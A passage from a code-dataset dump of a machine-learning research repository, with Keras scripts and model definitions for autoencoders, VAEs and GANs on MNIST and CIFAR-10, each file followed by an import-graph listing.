["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,494 | davidhayes3/ME-Project | refs/heads/master | /train_models/mnist_mlp/mnist_ls_interpolations.py | import numpy as np
from random import randint
from keras.datasets import mnist
from mnist_mlp_models import encoder_model, generator_model, vae_encoder_model
from common_models.common_models import vae_encoder_sampling_model
import matplotlib.pyplot as plt
from functions.data_funcs import get_mnist
# For each trained MNIST model, linearly interpolates between a '7' and a '5'
# both in pixel space and in latent space, and plots the two paths side by side.
# =====================================
# Define constants
# =====================================
img_rows = 28
img_cols = 28
channels = 1
img_shape = (img_rows, img_cols, channels)
latent_dim = 100
num_classes = 10
num_steps = 7
# =====================================
# Load data
# =====================================
# GAN-trained models use data scaled to [-1, 1]; AE-style models use [0, 1].
(_, _), (x_test_gan, y_test) = get_mnist(gan=True)
(_, _), (x_test_ae, _) = get_mnist()
# =====================================
# Interpolate
# =====================================
# Models after index 4 ('lr' onwards) were trained on GAN-scaled data.
model_names = ('basic_ae', 'dae', 'sae', 'vae', 'aae', 'lr', 'jlr', 'bigan', 'posthoc_bigan')
for i, model_name in enumerate(model_names):
    gan = i > 4
    x_test = x_test_gan if gan else x_test_ae
    image_path = 'Images/mnist_' + model_name + '_ls_interpolations'
    encoder_path = 'Models/mnist_' + model_name + '_encoder.h5'
    generator_path = 'Models/mnist_' + model_name + '_generator.h5'
    # The VAE stores mean/log-var heads; wrap them in a sampling model.
    if model_name == 'vae':
        vae_encoder = vae_encoder_model()
        encoder = vae_encoder_sampling_model(vae_encoder, latent_dim, img_shape, epsilon_std=0.05)
    else:
        encoder = encoder_model()
    encoder.load_weights(encoder_path)
    generator = generator_model(gan=gan)
    # 'lr' and 'posthoc_bigan' reuse the plain GAN generator's weights.
    if model_name in ('lr', 'posthoc_bigan'):
        generator.load_weights('Models/mnist_gan_generator.h5')
    else:
        generator.load_weights(generator_path)
    # Pick one '7' and one '5' from the test set as interpolation endpoints
    x_test_7 = x_test[y_test == 7]
    x_test_5 = x_test[y_test == 5]
    # Micro-batch with the two endpoint images
    X = np.array([x_test_7[8], x_test_5[7]])
    # Project the endpoints into latent space
    latent_x = encoder.predict(X)
    latent_start, latent_end = latent_x
    start_image, end_image = X
    vectors = []
    normal_images = []
    # Walk linearly from one endpoint to the other in both spaces
    alpha_values = np.linspace(0, 1, num_steps)
    for alpha in alpha_values:
        # Latent-space interpolation
        vectors.append(latent_start * (1 - alpha) + latent_end * alpha)
        # Pixel-space interpolation
        normal_images.append((1 - alpha) * start_image + alpha * end_image)
    # Decode the latent-space path back to images
    vectors = np.array(vectors)
    reconstructions = generator.predict(vectors)
    if gan:
        # Undo the [-1, 1] scaling used by GAN-trained generators
        reconstructions = 0.5 * reconstructions + 0.5
    reconstructions *= 255
    normal_images = np.array(normal_images)
    # Top row: pixel-space blends; bottom row: latent-space decodes
    plt.figure()
    n = len(reconstructions)
    # 'col' (not 'i') so the outer enumerate index is not shadowed
    for col in range(n):
        ax = plt.subplot(2, n, col + 1)
        plt.imshow(normal_images[col].reshape(img_rows, img_cols))
        plt.gray()
        ax.get_xaxis().set_visible(False)
        ax.get_yaxis().set_visible(False)
        ax = plt.subplot(2, n, col + 1 + n)
        plt.imshow(reconstructions[col].reshape(img_rows, img_cols))
        plt.gray()
        ax.get_xaxis().set_visible(False)
        ax.get_yaxis().set_visible(False)
plt.savefig(image_path) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", 
"/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,495 | davidhayes3/ME-Project | refs/heads/master | /train_models/cifar10_cnn/cifar10_plot_recons.py | import numpy as np
import matplotlib.pyplot as plt
from cifar10_models import deterministic_encoder_model, generator_model, vae_encoder_model
from common_models.common_models import vae_encoder_sampling_model
from functions.data_funcs import get_cifar10
import matplotlib.gridspec as gridspec
# Plots a 10x10 grid of CIFAR-10 test examples (num_recons_per_class per
# class) and, for each trained autoencoder variant, the corresponding grid of
# reconstructions.
# =====================================
# Define constants
# =====================================
img_rows = 32
img_cols = 32
channels = 3
img_shape = (img_rows, img_cols, channels)
latent_dim = 64
num_classes = 10
num_recons_per_class = 10
# =====================================
# Load dataset
# =====================================
# Load CIFAR-10 data in range [-1,1]
(X_train, _), (X_test, y_test) = get_cifar10()
classes = np.arange(num_classes)
test_digit_indices = np.empty(0)
# =====================================
# Choose examples from test set
# =====================================
# Collect num_recons_per_class test indices for each class, class by class
for class_index in range(num_classes):
    indices = [i for i, y in enumerate(y_test) if y == classes[class_index]]
    indices = np.asarray(indices)
    indices = indices[0:num_recons_per_class]
    test_digit_indices = np.concatenate((test_digit_indices, indices))
# BUG FIX: np.int was removed in NumPy 1.24; the builtin int is the
# documented replacement.
test_digit_indices = test_digit_indices.astype(int)
# Keep only the selected examples, ordered class by class
X_test = X_test[test_digit_indices]
# =====================================
# Plot test examples
# =====================================
num_rows = num_recons_per_class
num_cols = num_classes
plt.figure(figsize=(num_rows, num_cols))
gs = gridspec.GridSpec(num_rows, num_cols, width_ratios=num_cols * [1],
                       wspace=0., hspace=0., top=0.8, bottom=0.2, left=0.2, right=0.8)
for i in range(num_rows):
    for j in range(num_cols):
        # Row-major indexing strides by the number of columns (the original
        # used num_rows, which only worked because num_rows == num_cols)
        im = X_test[i * num_cols + j].reshape(img_shape)
        ax = plt.subplot(gs[i, j])
        plt.imshow(im)
        plt.gray()
        ax.get_xaxis().set_visible(False)
        ax.get_yaxis().set_visible(False)
plt.savefig('cifar10_test_examples')
# =====================================
# Plot model reconstructions
# =====================================
generator = generator_model()
for model in ('basic_ae', 'dae', 'aae', 'bigan_determ', 'vae'):
    # The VAE has mean/log-var heads and needs a sampling wrapper
    if model == 'vae':
        vae_encoder = vae_encoder_model()
        encoder = vae_encoder_sampling_model(vae_encoder, latent_dim, img_shape, epsilon_std=0.05)
    else:
        encoder = deterministic_encoder_model()
    encoder.load_weights('Models/cifar10_' + model + '_encoder.h5')
    generator.load_weights('Models/cifar10_' + model + '_generator.h5')
    recon_x = generator.predict(encoder.predict(X_test))
    num_rows = num_classes
    num_cols = num_recons_per_class
    plt.figure(figsize=(num_rows, num_cols))
    gs = gridspec.GridSpec(num_rows, num_cols, width_ratios=num_recons_per_class * [1],
                           wspace=0., hspace=0., top=0.8, bottom=0.2, left=0.2, right=0.8)
    for i in range(num_rows):
        for j in range(num_cols):
            # Same row-major stride fix as above
            im = recon_x[i * num_cols + j].reshape(img_rows, img_cols, channels)
            ax = plt.subplot(gs[i, j])
            plt.imshow(im)
            ax.get_xaxis().set_visible(False)
            ax.get_yaxis().set_visible(False)
    plt.savefig('Images/cifar10_' + model + '_recons.png')
| {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", 
"/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,496 | davidhayes3/ME-Project | refs/heads/master | /train_models/mnist_mlp/mnist_mlp_models.py | from keras.layers import Input, Dense, Reshape, Flatten, Dropout, BatchNormalization, Activation, concatenate, Lambda
from keras.layers.advanced_activations import LeakyReLU
from keras.models import Sequential, Model
from keras.regularizers import l1
from keras import backend as K
import numpy as np
# Define constants
# MNIST input geometry: 28x28 single-channel images.
img_rows = 28
img_cols = 28
channels = 1
img_shape = (img_rows, img_cols, channels)
# Size of the latent code shared by every model defined in this file.
latent_dim = 100
def encoder_model():
    """Deterministic encoder: 28x28x1 image -> latent_dim vector.

    Two 512-unit hidden layers with LeakyReLU and batch norm; the final
    Dense has no activation (unconstrained latent code).

    Fix: the original passed input_shape=(latent_dim,) to the first hidden
    Dense; Keras ignores input_shape on a non-first layer and the value was
    wrong anyway (the flattened input is 784-dim), so it is removed.
    """
    model = Sequential()
    model.add(Flatten(input_shape=img_shape))
    model.add(Dense(512))
    model.add(LeakyReLU(alpha=0.2))
    model.add(BatchNormalization(momentum=0.8))
    model.add(Dense(512))
    model.add(LeakyReLU(alpha=0.2))
    model.add(BatchNormalization(momentum=0.8))
    model.add(Dense(latent_dim))
    return model
def sparse_encoder_model():
    """L1-regularized (sparse) encoder: 28x28x1 image -> latent_dim vector.

    Same topology as encoder_model, but each hidden Dense layer carries an
    l1 activity regularizer to encourage sparse activations.
    """
    model = Sequential()
    model.add(Flatten(input_shape=img_shape))
    # Two identical regularized hidden stages.
    for _ in range(2):
        model.add(Dense(512, activity_regularizer=l1(10e-5)))
        model.add(LeakyReLU(alpha=0.2))
        model.add(BatchNormalization(momentum=0.8))
    model.add(Dense(latent_dim))
    return model
def vae_encoder_model():
    """VAE encoder: image -> (z_mean, z_log_var), each of size latent_dim."""
    img = Input(shape=img_shape)
    h = Flatten()(img)
    # Two 512-unit hidden stages shared by both output heads.
    for _ in range(2):
        h = Dense(512)(h)
        h = LeakyReLU(alpha=0.2)(h)
    z_mean = Dense(latent_dim)(h)
    z_log_var = Dense(latent_dim)(h)
    return Model(img, [z_mean, z_log_var])
def generator_model(gan=False):
    """Generator/decoder: latent_dim vector -> 28x28x1 image.

    Args:
        gan: when False (the default), the output activation is sigmoid
            (pixels in [0, 1], autoencoder-style data); otherwise tanh
            (pixels in [-1, 1], GAN-style data).

    Fixes: the original passed input_shape=(latent_dim,) to the second Dense
    as well (ignored by Keras on a non-first layer) and used two separate
    `if` statements with mutually exclusive conditions; both cleaned up.
    """
    model = Sequential()
    model.add(Dense(512, input_shape=(latent_dim,)))
    model.add(LeakyReLU(alpha=0.2))
    model.add(BatchNormalization(momentum=0.8))
    model.add(Dense(512))
    model.add(LeakyReLU(alpha=0.2))
    model.add(BatchNormalization(momentum=0.8))
    model.add(Dense(np.prod(img_shape)))
    # Output squashing matches the range of the training data.
    if gan is False:
        model.add(Activation('sigmoid'))
    else:
        model.add(Activation('tanh'))
    model.add(Reshape(img_shape))
    return model
def context_generator_model(missing_shape):
    """Context-encoder generator: latent vector -> missing image patch.

    Args:
        missing_shape: shape of the patch to in-paint; the output is
            tanh-squashed into [-1, 1] and reshaped to this shape.
    """
    return Sequential([
        Dense(512, input_shape=(latent_dim,)),
        LeakyReLU(alpha=0.2),
        BatchNormalization(momentum=0.8),
        Dense(512),
        LeakyReLU(alpha=0.2),
        BatchNormalization(momentum=0.8),
        Dense(np.prod(missing_shape)),
        Activation('tanh'),
        Reshape(missing_shape),
    ])
def bigan_discriminator_model():
    """BiGAN discriminator scoring a joint (latent, image) pair.

    Maps [z, img] to a sigmoid validity score in (0, 1).
    """
    z = Input(shape=(latent_dim,))
    img = Input(shape=img_shape)
    h = concatenate([z, Flatten()(img)])
    # Three identical Dense -> LeakyReLU -> Dropout stages.
    for _ in range(3):
        h = Dense(1024)(h)
        h = LeakyReLU(alpha=0.2)(h)
        h = Dropout(0.5)(h)
    validity = Dense(1, activation='sigmoid')(h)
    return Model([z, img], validity)
def gan_discriminator_model():
    """Image-only GAN discriminator: flattened image -> three
    Dense(1024)+LeakyReLU+Dropout stages -> sigmoid real/fake probability."""
    img = Input(shape=img_shape)
    features = Flatten()(img)
    for _ in range(3):
        features = Dense(1024)(features)
        features = LeakyReLU(alpha=0.2)(features)
        features = Dropout(0.5)(features)
    validity = Dense(1, activation='sigmoid')(features)
    return Model(img, validity)
def aae_discriminator_model():
    """Adversarial-autoencoder discriminator over latent codes: z -> three
    Dense(1024)+LeakyReLU+Dropout stages -> sigmoid real/fake probability."""
    z = Input(shape=(latent_dim,))
    features = z
    for _ in range(3):
        features = Dense(1024)(features)
        features = LeakyReLU(alpha=0.2)(features)
        features = Dropout(0.5)(features)
    validity = Dense(1, activation='sigmoid')(features)
    return Model(z, validity)
def context_discriminator_model(missing_shape):
    """Context-encoder discriminator: judges whether an image patch of shape
    `missing_shape` is a real crop or a generated fill-in."""
    img = Input(shape=missing_shape)
    model = Flatten()(img)
    # Three identical Dense(1024) -> LeakyReLU -> Dropout stages.
    model = Dense(1024)(model)
    model = LeakyReLU(alpha=0.2)(model)
    model = Dropout(0.5)(model)
    model = Dense(1024)(model)
    model = LeakyReLU(alpha=0.2)(model)
    model = Dropout(0.5)(model)
    model = Dense(1024)(model)
    model = LeakyReLU(alpha=0.2)(model)
    model = Dropout(0.5)(model)
    # Sigmoid validity head.
    # NOTE(review): the closing `return Model(img, validity)` on the next line is
    # fused with dataset-extraction residue (an import-graph JSON blob) and is
    # left untouched here; it needs manual cleanup at the source.
    validity = Dense(1, activation='sigmoid')(model)
return Model(img, validity) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", 
"/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,497 | davidhayes3/ME-Project | refs/heads/master | /latent_space_visualization/statistical_analysis/cifar10/cifar10_interclass_correlations.py | import os
import glob
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn
from keras.datasets import cifar10
import numpy as np
import keras.utils
import matplotlib.pyplot as plt
from cifar10_models import encoder_model, deterministic_encoder_model
from scipy.stats.stats import pearsonr
# Define constants
num_classes = 10
latent_dim = 64

# Load saved weights for the deterministic BiGAN encoder
encoder = deterministic_encoder_model()
encoder.load_weights('cifar10_bigan_determ_encoder.h5')

# Load CIFAR-10 data (original comment said MNIST; the code loads CIFAR-10)
# and scale pixel values to [0, 1]
(X_train, y_train), (X_test, y_test) = cifar10.load_data()
X_train = X_train.astype(np.float32) / 255.
X_test = X_test.astype(np.float32) / 255.
y_test_one_hot = keras.utils.to_categorical(y_test, num_classes)
# CIFAR-10 labels arrive as shape (N, 1); flatten to (N,) for the boolean masks below
y_train = y_train.reshape((y_train.shape[0]))

# Encode the training set into the latent space
latent_spaces = encoder.predict(X_train)

# Get max and min value of entire set for later plotting purposes
# NOTE(review): these assignments shadow the builtins `max`/`min`
max = np.max(latent_spaces)
min = np.min(latent_spaces)

# Split the encoded training set by class label
latent_plane = latent_spaces[y_train == 0]
latent_automobile = latent_spaces[y_train == 1]
latent_bird = latent_spaces[y_train == 2]
latent_cat = latent_spaces[y_train == 3]
latent_deer = latent_spaces[y_train == 4]
latent_dog = latent_spaces[y_train == 5]
latent_frog = latent_spaces[y_train == 6]
latent_horse = latent_spaces[y_train == 7]
latent_ship = latent_spaces[y_train == 8]
latent_truck = latent_spaces[y_train == 9]

# Create list of all latent arrays (appears unused below in this script)
latent_sets = (latent_plane, latent_automobile, latent_bird, latent_cat, latent_deer, latent_dog, latent_frog,
               latent_horse, latent_ship, latent_truck)

# Create empty array for correlations
correlations = np.zeros((latent_dim, latent_dim))

# Pearson correlation between every pair of latent dimensions for two chosen classes
# (cat vs dog; the commented alternative compares ship vs automobile)
for i in range(latent_dim):
    for j in range(latent_dim):
        correlations[i, j] = np.corrcoef(latent_cat[:, i], latent_dog[:, j])[0][1]
        #correlations[i,j] = np.corrcoef(latent_ship[:,i], latent_automobile[:,j])[0][1]

# Create heatmap of correlation coefficients
seaborn.heatmap(correlations, cmap='RdYlGn_r', vmax=1.0, vmin=-1.0, linewidths=2.5)

# Change orientation of labels for easier readability
plt.yticks(rotation=0)
plt.xticks(rotation=90)

# Label axes
plt.xlabel('Cat')
plt.ylabel('Dog')

# Save plots
plt.savefig('cifar10_cat_dog_latent')
#plt.savefig('cifar10_ship_automobile_latent') | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": 
["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,498 | davidhayes3/ME-Project | refs/heads/master | /other/mnist/bigan/mnist_dcgan.py | from __future__ import print_function, division
from keras.datasets import mnist
from keras.layers import Input, Dense, Reshape, Flatten, Dropout
from keras.layers import BatchNormalization, Activation, ZeroPadding2D
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.convolutional import UpSampling2D, Conv2D
